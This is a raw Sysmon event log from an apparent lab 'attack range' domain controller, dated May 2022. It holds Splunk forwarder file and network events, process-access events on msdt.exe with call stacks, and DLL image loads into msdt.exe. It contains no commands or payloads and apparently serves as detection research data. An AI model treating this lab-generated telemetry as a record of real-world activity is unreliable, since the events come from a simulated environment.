Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67106EA4BCEC57A0C1AE310C178A5ABC,SHA256=9174F7A58E5D045B6887B20DB690B6F28F0DBB0CE9BBAA36616B646233BA3B0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:58.036{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53321-false10.0.1.12-8000- 23542300x800000000000000098947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:01.202{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5290CE11D4F100D1EEF2AD8950D0FC,SHA256=CB9AE4E67BCB1251CFE7B71112E6879E344FB24CE0F87FE59A113F834699F7E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:02.296{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCC83D7D004706AA21C690503F029EC,SHA256=573EA8AB1C786A76E2AF9B2571CE8B3E0BA6C722DA39A1EF01E8FD587A93CD2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:03.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37153EA594FA5D33091D015A6A3C9D9,SHA256=5CABC33E3A0BEFFB43DFF1458B618EAD1CED5DBC6EE30E580569FD7F0FBC1CCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:04.484{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970413568FBB5ECD17F4DDBDDBBAB514,SHA256=4FFB8A58AAC25C1C86C3C4DADABABD4831BD242F3DE1CC184E62FB4979E5AF77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:05.577{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C465F4A2D0DBDF64453A80D592C02D0,SHA256=4DA6903F1A6D55FB631DCDB8BD41964F875F85A25F9825DD2C2213EFFFCB009E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:06.671{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307393BA6658255D1CCF7AAD9F44226C,SHA256=1ADABA00A7A025AD6490BF5A58E52FEBA80B8DCE571D08604FB734564353C5DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:04.052{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53322-false10.0.1.12-8000- 23542300x800000000000000098954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:07.765{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABCA10591316B11566BE0B429A6AD29,SHA256=FA6184E14848BB07B0E62AA3265521F3FEEEC53C4A5D36F1B7D5BEBCEAF50559,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:08.859{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9463606F2791D94B197C4BAD11EC877B,SHA256=48FF47941C31821E590C9BDA6D58B22C643A20F11C5F19B473970EA5FB47D7CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:09.952{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4140C494AFAF198EB79A1311EEE3FC75,SHA256=652D82908E811555573A9C202793D9587602C604B695F36CD91ED707F1BEFA89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:11.046{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BC6FE4722F17F2FDC904FDEC938797C,SHA256=89FFB77D8FF735DB6D1BD45AE2E2918FFB54F68321DA77B7471C3A9A7AAB369E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:12.140{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEB2541292847BED5F950D73B839D08,SHA256=47B9F2D650657BC8A410F6588F70BD06EF4E7421B42F50E77C343C26C5A65D98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:13.233{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31114298ECF6B2C7E6B0D03558382735,SHA256=0A0A7B96117268A4BD506B699843407A4A8E5BCA108560A2F0370A3CA9F8C795,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48006220C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.905{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.859{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 734700x800000000000000099027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 10341000x800000000000000099026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-E600-000000005502}44004484C:\Windows\system32\taskhostw.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msftedit.dll10.0.14393.4704 (rs1_release.211004-1917)Rich Text Edit Control, v8.5Microsoft® Windows® Operating SystemMicrosoft CorporationMsftEdit.DLLMD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532trueMicrosoft WindowsValid 10341000x800000000000000099020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.890{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.874{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x800000000000000099015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x800000000000000099014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.843{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 734700x800000000000000099013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\winhttp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350FtrueMicrosoft WindowsValid 10341000x800000000000000099012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-A254-6294-1600-000000005502}13001356C:\Windows\system32\svchost.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20trueMicrosoft WindowsValid 